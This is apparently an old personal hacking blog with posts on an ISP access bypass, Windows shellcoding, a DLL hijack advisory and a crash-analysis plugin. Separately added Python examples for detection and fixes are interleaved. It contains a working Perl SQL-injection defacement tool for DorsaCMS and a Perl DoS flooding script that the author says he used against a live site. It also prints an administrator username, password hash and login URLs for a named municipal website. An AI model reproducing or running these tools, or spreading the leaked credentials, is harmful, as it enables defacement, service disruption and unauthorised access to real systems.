Wednesday, July 17, 2013

isp access restriction bypass via web cache proxy

today i want to explain a vulnerability that i discovered in some ISP web cache proxies in Iran.
i presented this vulnerability at the first Sharif University cyber security awareness conference
( http://cert.sharif.edu )
by using this vulnerability, when the ISP closes your account, you can browse web pages again!


what is a web cache proxy?
A web cache is a mechanism for the temporary storage (caching) of web documents, such as HTML pages and images, to reduce bandwidth usage, server load, and perceived lag. A web cache stores copies of documents passing through it; subsequent requests may be satisfied from the cache if certain conditions are met.

dns redirect page
When the ISP's DNS server receives a request for a name that is not recognized or is unavailable, the DNS server returns the IP address of a search page to the client. When the client is using a web browser, this will display a search page that contains possible suggestions on the proper address and a small explanation of the error. These search pages often contain advertising that is paid to the ISP.


but how does this vulnerability work?!
in this case the ISP restricts our access to all web servers except one, and what is this one?!!
this server is the web cache proxy itself! we only have access to the ip of the web cache proxy, but any http request can be sent through that ip, and the proxy fetches the page for us!


for example, i want to see a web page (like farsnews.com), so i make an http request for it over the ip of the web cache (the dns redirect server) that i still have access to:


and you can see the web page is loaded successfully!

i tested this vulnerability on the largest private ISP in Iran (parsonline.com) and recorded a demo that you can see here:

the vulnerability is now fixed on Pars Online, but other ISPs may still be affected!
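A defender-side check for the ISP, added here as an example and not part of the original post: it reads the proxy's access log and flags any closed account that reached anything other than the redirect page, which is exactly the traffic this bypass produces. The log layout, the closed-account list and the hostname search.isp.example are constructed for the example.

```python
import re
from collections import defaultdict

# Constructed access-log lines in a squid-like layout: timestamp, subscriber ip, cache result, method, URL.
# search.isp.example plays the ISP's own "dns redirect" page, the only thing a closed account should reach.
LOG_LINES = """\
1373990401.101 10.20.30.40 TCP_MISS/200 GET http://search.isp.example/?q=typo
1373990402.202 10.20.30.40 TCP_MISS/200 GET http://farsnews.com/
1373990403.303 10.20.30.41 TCP_HIT/200 GET http://farsnews.com/news/1
1373990404.404 10.20.30.40 TCP_MISS/200 CONNECT farsnews.com:443
1373990405.505 10.20.30.42 TCP_MISS/200 GET http://search.isp.example/?q=x
""".splitlines()

CLOSED_ACCOUNTS = {"10.20.30.40", "10.20.30.42"}   # subscribers the ISP has cut off (constructed)
REDIRECT_HOSTS = {"search.isp.example"}

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<result>\S+) (?P<method>\S+) (?P<url>\S+)$")
HOST_RE = re.compile(r"^(?:https?://)?([^/:]+)")   # also covers CONNECT's bare host:port form

def parse_line(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    h = HOST_RE.match(m.group("url"))
    return {"client": m.group("client"), "host": h.group(1).lower() if h else None,
            "method": m.group("method"), "url": m.group("url")}

def find_bypass(lines, closed, redirect_hosts):
    """Map each closed account that fetched anything but the redirect page to the URLs it reached."""
    hits = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["client"] not in closed:
            continue
        if rec["host"] not in redirect_hosts:
            hits[rec["client"]].append(rec["url"])
    return dict(hits)

if __name__ == "__main__":
    for client, urls in find_bypass(LOG_LINES, CLOSED_ACCOUNTS, REDIRECT_HOSTS).items():
        print(client, "reached", urls)
```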

Tuesday, May 31, 2011

simple windows shellcoding

in this post i want to show a simple way of making shellcode under the windows operating system

debuggers can help us write shellcode quickly and test it.
do you remember the exe file injection method? in this method we must find a free code area in the exe file, called a code cave.
in the code cave we can insert assembly instructions and run them!
after inserting our code, we must change the instruction pointer to the address where our code begins.

ok, i guess you understand the method that i want to use.
let's go!
i want to make a MessageBox shellcode that shows d3c0der!


to convert your word (the one you want the shellcode to show) to hex, you can use this site:
http://centricle.com/tools/ascii-hex/
this is an example of converting the "d3c0der" word:





here is the simple code in assembly language:


; immediates are hex, as the debugger shows them: 64 33 63 30 64 65 72 = "d3c0der"
xor eax,eax                      ; clear the registers we use
xor ebx,ebx
xor ecx,ecx
xor edx,edx
mov byte ptr ss:[ebp-7],64       ; write "d3c0der" onto the stack, one byte at a time
mov byte ptr ss:[ebp-6],33
mov byte ptr ss:[ebp-5],63
mov byte ptr ss:[ebp-4],30
mov byte ptr ss:[ebp-3],64
mov byte ptr ss:[ebp-2],65
mov byte ptr ss:[ebp-1],72
push 0                           ; uType = MB_OK
lea ebx,dword ptr ss:[ebp-7]
push ebx                         ; lpCaption -> "d3c0der"
lea ecx,dword ptr ss:[ebp-7]
push ecx                         ; lpText -> "d3c0der"
push 0                           ; hWnd = NULL
mov eax,user32.messageboxa
call eax                         ; MessageBoxA(hWnd, lpText, lpCaption, uType)


the code cave area:


now i insert this code into the debugger:


the first instruction that i use is "xor eax,eax"
and its address is 01010D47 (we use it for changing EIP)

take a look at the registers window, and look at the instruction pointer address.


go to this address:


and replace the "push 60" with "JMP 01010D47"


now run the program; you can see the d3c0der message.

but there is a problem: null bytes! shellcode must be free of null bytes.
which part of our code makes null bytes?!
it is "push 0"
we can use an old technique to remove the null byte:
by replacing "push 0" with
xor ecx,ecx
push ecx
we solve this problem, and our final shellcode is:

xor eax,eax
xor ebx,ebx
xor ecx,ecx
xor edx,edx
mov byte ptr ss:[ebp-7],64
mov byte ptr ss:[ebp-6],33
mov byte ptr ss:[ebp-5],63
mov byte ptr ss:[ebp-4],30
mov byte ptr ss:[ebp-3],64
mov byte ptr ss:[ebp-2],65
mov byte ptr ss:[ebp-1],72
xor ecx,ecx
push ecx
lea ebx,dword ptr ss:[ebp-7]
push ebx
lea ecx,dword ptr ss:[ebp-7]
push ecx
xor ecx,ecx
push ecx
mov eax,user32.messageboxa
call eax
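An added check (not from the original post) that puts numbers on the null-byte problem: it encodes the seven instruction forms used above with their 32-bit x86 opcodes, assembles both listings and reports where the 00 bytes sit. The MessageBoxA address is a placeholder; the real one comes from the debugger, and if it contains a 00 byte it reintroduces a null that the substitution above does not remove.

```python
import re
import struct

REG = {"eax": 0, "ecx": 1, "edx": 2, "ebx": 3}
# Placeholder for the address the debugger shows for user32.MessageBoxA (assumed, not from the post);
# if the real address contains a 00 byte, "mov eax,<addr>" reintroduces a null by itself.
MESSAGEBOXA = 0x7E4507EA

def encode(instr):
    """Encode the handful of 32-bit x86 forms the post uses; immediates are hex, as OllyDbg shows them."""
    s = instr.strip().lower()
    if m := re.fullmatch(r"xor (\w+),\1", s):                      # xor r32,r32 (same register)
        r = REG[m.group(1)]
        return bytes([0x31, 0xC0 | (r << 3) | r])
    if m := re.fullmatch(r"mov byte ptr ss:\[ebp-([0-9a-f]+)\],([0-9a-f]+)", s):
        return bytes([0xC6, 0x45, -int(m.group(1), 16) & 0xFF, int(m.group(2), 16)])
    if m := re.fullmatch(r"lea (\w+),dword ptr ss:\[ebp-([0-9a-f]+)\]", s):
        return bytes([0x8D, 0x45 | (REG[m.group(1)] << 3), -int(m.group(2), 16) & 0xFF])
    if s == "push 0":                                               # 6A 00: the null byte
        return bytes([0x6A, 0x00])
    if m := re.fullmatch(r"push (\w+)", s):                         # push r32
        return bytes([0x50 + REG[m.group(1)]])
    if s == "mov eax,user32.messageboxa":                           # B8 imm32
        return b"\xb8" + struct.pack("<I", MESSAGEBOXA)
    if s == "call eax":                                             # FF D0
        return bytes([0xFF, 0xD0])
    raise ValueError("unsupported instruction: " + instr)

def assemble(listing):
    return b"".join(encode(line) for line in listing.splitlines() if line.strip())

def null_offsets(code):
    """Offsets of every 0x00 byte in the shellcode (what the post wants to be empty)."""
    return [i for i, b in enumerate(code) if b == 0]

# The post's two listings, rebuilt from the same instructions.
ZERO_REGS = "xor eax,eax\nxor ebx,ebx\nxor ecx,ecx\nxor edx,edx\n"
WRITE_STR = "".join(f"mov byte ptr ss:[ebp-{7 - i}],{b:x}\n" for i, b in enumerate(b"d3c0der"))
ARGS = "lea ebx,dword ptr ss:[ebp-7]\npush ebx\nlea ecx,dword ptr ss:[ebp-7]\npush ecx\n"
FIRST_TRY = ZERO_REGS + WRITE_STR + "push 0\n" + ARGS + "push 0\nmov eax,user32.messageboxa\ncall eax\n"
FINAL = FIRST_TRY.replace("push 0\n", "xor ecx,ecx\npush ecx\n")   # the post's substitution

if __name__ == "__main__":
    print("first try:", len(assemble(FIRST_TRY)), "bytes, nulls at", null_offsets(assemble(FIRST_TRY)))
    print("final    :", len(assemble(FINAL)), "bytes, nulls at", null_offsets(assemble(FINAL)))
```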


good luck!

Sunday, February 6, 2011

how was the hillsboro beach website hacked?

a few weeks ago i read a news story on foxnews about an american website:

http://www.foxnews.com/scitech/2011/01/18/florida-communitys-website-targeted-iranian-hackers/

i logged in to the website and found the bug; in this post i want to show the vulnerability of this site :d

let's go!
first, the home page:

sql error:

the number of selected columns is incorrect:

mysql version:


username and password :d :


user : tohbadministrator
pass : 481a91595db92d57

and the login pages:
http://townofhillsborobeach.com/cmsadmin/index.php
http://townofhillsborobeach.com/ControlPanel/index.xsl

i have a message for foxnews: they are not iranian pro hackers! they are some basiji script kiddies . . .
good luck :p

Tuesday, January 4, 2011

ImgBurn 2.4.0.0 dll hijack vulnerability

I have found a vulnerability in ImgBurn that could allow a remote attacker to execute arbitrary code on the system. The application does not directly specify the fully qualified path to a dynamic-linked library (dwmapi.dll) when running on Microsoft Windows. By persuading a victim to open a specially-crafted file from a WebDAV or SMB share using a vulnerable application, a remote attacker could exploit this vulnerability via a specially-crafted library to execute arbitrary code on the system.







IN THE NEWS:

http://www.governmentsecurity.org/latest-security-news/critical-vulnerability-in-imgburn.html
http://www.livehacking.com/2011/01/05/unpatched-hole-in-imgburn-disk-burning-application/
http://www.h-online.com/security/news/item/Unpatched-hole-in-ImgBurn-disk-burning-application-1163003.html
http://forums.cnet.com/7723-6132_102-512542.html
http://www.net-security.org/secworld.php?id=10397
http://www.esecurityplanet.com/headlines/article.php/3919281/Security-Vulnerability-Found-in-ImgBurn.htm
http://www.naked-security.com/nsa/185411.htm
http://www.zerodaylab.com/vulnerabilities/CVE-2011/CVE-2011-0403.html




Thursday, December 16, 2010

DorsaCms SQL Injection Vulnerability

Dorsa is a cms that has a security certificate.

you can see the security certificate at this link:
http://dorsagroup.ir/ShowPage.aspx?page_=form&order=show&lang=1&sub=0&PageId=69&tempname=Other

but i found a blind SQL Injection vulnerability in this CMS

http://packetstormsecurity.org/files/view/96736/dorsacmsdefacer-sql.txt

exploit code (tested on windows xp):


    #!/usr/bin/perl
    #d3c0der
    system('color a');
    system('cls');
    system('title DorsaCMS Defacer');
    print q{
    ===================================================
    -= ** =-
    DorsaCMS Defacer

    [+] Coded by d3c0der   =>  d3c0der@hotmail.com

    [+] AttackerZ Under Ground Group  =>  wwW.Attackerz.iR
    -= ** =-
    ===================================================


    };

    use HTTP::Request;
    use LWP::UserAgent;



    print "~# Target : ";
    $site=<STDIN>;
    chomp $site;
    print "~# PageID : ";
    $id=<STDIN>;
    chomp $id;
     print "~# Deface Text : ";
    $def=<STDIN>;
    chomp $def;

    if ( $site !~ /^http:/ ) {
    $site = 'http://' . $site;
    }
    if ( $site !~ /\/$/ ) {
    $site = $site . '/';
    }
    print "\n";

    print "->hacking : $site\n";




    @path1=("ShowPage.aspx?page_=news&lang=1&sub=0&PageID=$id update news set Comment='$def';--");

    foreach $ways(@path1){

    $final=$site.$ways;

    my $req=HTTP::Request->new(GET=>$final);
    my $ua=LWP::UserAgent->new();
    $ua->timeout(30);
    my $response=$ua->request($req);


    }

    print "[-] now this url is hacked ${site}ShowPage.aspx?page_=news&lang=1&sub=0&PageID=$id\n";




    ##
    # By d3c0der
    ##
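To show the fix side, an added example that is not the CMS's code: a toy news table in sqlite, the page lookup written the way the exploit above assumes (PageID pasted into the SQL text, stacked statements allowed) beside a version that validates PageID as an integer and binds it. The payload keeps the post's shape with a ';' added, since sqlite, unlike T-SQL, needs a separator between the two statements.

```python
import sqlite3

# Payload shape from the post, adapted for sqlite: T-SQL runs "1 update ..." without a separator,
# sqlite needs the ";" between the two statements. The deface text is constructed.
PAYLOAD = "1; update news set Comment='defaced (example)';--"

def make_db():
    """In-memory stand-in for the CMS's news table (constructed for the example)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (PageID INTEGER, Title TEXT, Comment TEXT)")
    db.execute("INSERT INTO news VALUES (1, 'welcome', 'original comment')")
    db.commit()
    return db

def comment_of(db, page_id=1):
    return db.execute("SELECT Comment FROM news WHERE PageID=?", (page_id,)).fetchone()[0]

def show_page_vulnerable(db, page_id):
    """PageID pasted straight into the SQL text and run through an API that executes stacked
    statements (sqlite's executescript plays the role of the CMS's database layer)."""
    sql = "SELECT Title FROM news WHERE PageID=" + page_id
    db.executescript(sql)            # the injected UPDATE runs as a second statement

def show_page_fixed(db, page_id):
    """Validate the parameter as an integer, then bind it; the SQL text never changes."""
    pid = int(page_id)               # raises ValueError for anything that is not a plain number
    row = db.execute("SELECT Title FROM news WHERE PageID=?", (pid,)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    show_page_vulnerable(db, PAYLOAD)
    print("vulnerable lookup, comment now:", comment_of(db))
    db = make_db()
    try:
        show_page_fixed(db, PAYLOAD)
    except ValueError as err:
        print("fixed lookup rejected payload:", err)
    print("fixed lookup, comment still:", comment_of(db))
```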



Thursday, December 2, 2010

simple d.o.s attacker

Hi,
I wrote a simple perl denial of service script.

I've got it working on windows xp with ActivePerl.
i used this script to attack the mysql port of a security website, and here is the result ;)



please use this code FOR EDUCATIONAL PURPOSES ONLY

    #!/usr/bin/perl
    #d3c0der
    system('color a');
    system('cls');
    print q{
    ===================================================
    -= ** =-
    AttackerZ d.o.s Attacker - version 1.0

    [+] coded by d3c0der   =>  d3c0der@hotmail.com

    [+] AttackerZ Under Ground TM  =>  wwW.Attackerz.iR
    -= ** =-

    ===>  FOR EDUCATIONAL PURPOSES  ONLY <===

    ===================================================


    };

    use IO::Socket;

    print "Host: ";{
    chop ($host = <stdin>);
    print "Port: ";
    chop ($port = <stdin>);
    print "SYN Requests to send : ";
    chop ($num= <stdin>);
    }
    if(defined($ARGV[2])){
    $host = $ARGV[0];
    $port = $ARGV[1];
    $num = $ARGV[2];
    }
    for ($i=0; $i<$num; $i++)
    {
    $len = length $form;
    $sock = IO::Socket::INET->new (
    PeerAddr => $host,
    PeerPort => $port,
    Proto => 'tcp') || die "$! sorry ! Can't Connect";
    syswrite STDOUT, "[+]SYN Request: $i\n";
    }
    $local_time = localtime();

    $login = getlogin();
    print " hello $login , your attack finish at $local_time\n";

    print "All packets sent to $host\n";

     print "Press any key To exit...";
    $end = <STDIN>;
    chop ($end);

Wednesday, November 24, 2010

!exploitable Crash Analyzer

!exploitable (pronounced "bang exploitable") Crash Analyzer is a plugin for the Windows Debugger that parses your crash logs and gives you two important pieces of information. First, it will collate all of your crashes and determine exactly how many there actually are. So for example, out of 60 crash reports, there may only be 2 or 3 actual problems.


    0:006> g
    (19ec.1a0): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=00000001 ebx=00000113 ecx=00000001 edx=00000000 esi=7c57edd2 edi=007f46bc
    eip=41414141 esp=0098fd88 ebp=0098fde0 iopl=0         nv up ei pl nz ac po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010212
    41414141 ??              ???
    0:001> !load msec.dll
    0:001> !exploitable
    Exploitability Classification: EXPLOITABLE
    Recommended Bug Title: Exploitable - Read Access Violation at the Instruction Pointer starting at 
    Unknown Symbol @ 0x0000000041414141 called from KERNEL32!BaseThreadStart+0x0000000000000052 (Hash=0x264d5172.0x5a5e1f77)
    
    Access violations at the instruction pointer are exploitable if not near NULL.


The second thing it does is look at the type of crash and try to determine if the error is something that could be exploited by a malicious hacker. This means that more junior employees can work these bug issues without taking the time of more senior examiners. Jason Shirk from the Security Core team joined us to take a look at !exploitable. To download the app, go to: http://www.codeplex.com/msecdbg.
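The rule quoted in the transcript ("exploitable if not near NULL") applied by hand, as an added example rather than the plugin's own logic: it parses the register dump above, checks that the instruction at EIP is unreadable, and classifies by EIP's distance from NULL. The 0x10000 cut-off and the near-NULL variant are assumptions made for the example; the category names follow !exploitable's vocabulary.

```python
import re

# The register dump from the post, embedded as sample input (trimmed to the lines used here).
CRASH_FROM_POST = """\
(19ec.1a0): Access violation - code c0000005 (first chance)
eax=00000001 ebx=00000113 ecx=00000001 edx=00000000 esi=7c57edd2 edi=007f46bc
eip=41414141 esp=0098fd88 ebp=0098fde0 iopl=0         nv up ei pl nz ac po nc
41414141 ??              ???
"""
# Constructed variant: same fault, but EIP landed near NULL (typical of an uninitialised pointer).
CRASH_NEAR_NULL = CRASH_FROM_POST.replace("41414141", "00000010")

NEAR_NULL_LIMIT = 0x10000   # assumed cut-off for "near NULL"; the post states the rule, not a number

def parse_crash(text):
    """Pull the exception kind/code, the 32-bit registers and the disassembly at EIP out of a WinDbg dump."""
    m = re.search(r"\): (.+?) - code ([0-9a-f]{8})", text)
    regs = {k: int(v, 16) for k, v in re.findall(r"\b(e[a-z]{2})=([0-9a-f]{8})", text)}
    eip_line = None
    if "eip" in regs:
        eip_line = re.search(r"(?m)^%08x\s+(\S+)" % regs["eip"], text)
    return {"kind": m.group(1) if m else None, "code": m.group(2) if m else None,
            "regs": regs, "disasm_at_eip": eip_line.group(1) if eip_line else None}

def classify(crash):
    """The post's rule: an access violation at the instruction pointer is exploitable unless EIP is near NULL."""
    if crash["kind"] != "Access violation":
        return "UNKNOWN"
    eip = crash["regs"].get("eip")
    if eip is None or crash["disasm_at_eip"] != "??":
        return "UNKNOWN"          # the instruction at EIP is readable: not an EIP-controlled fault
    return "EXPLOITABLE" if eip >= NEAR_NULL_LIMIT else "PROBABLY_NOT_EXPLOITABLE"

if __name__ == "__main__":
    for name, dump in (("post", CRASH_FROM_POST), ("near-null variant", CRASH_NEAR_NULL)):
        crash = parse_crash(dump)
        print(name, "eip=%08x" % crash["regs"]["eip"], "->", classify(crash))
```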

download video: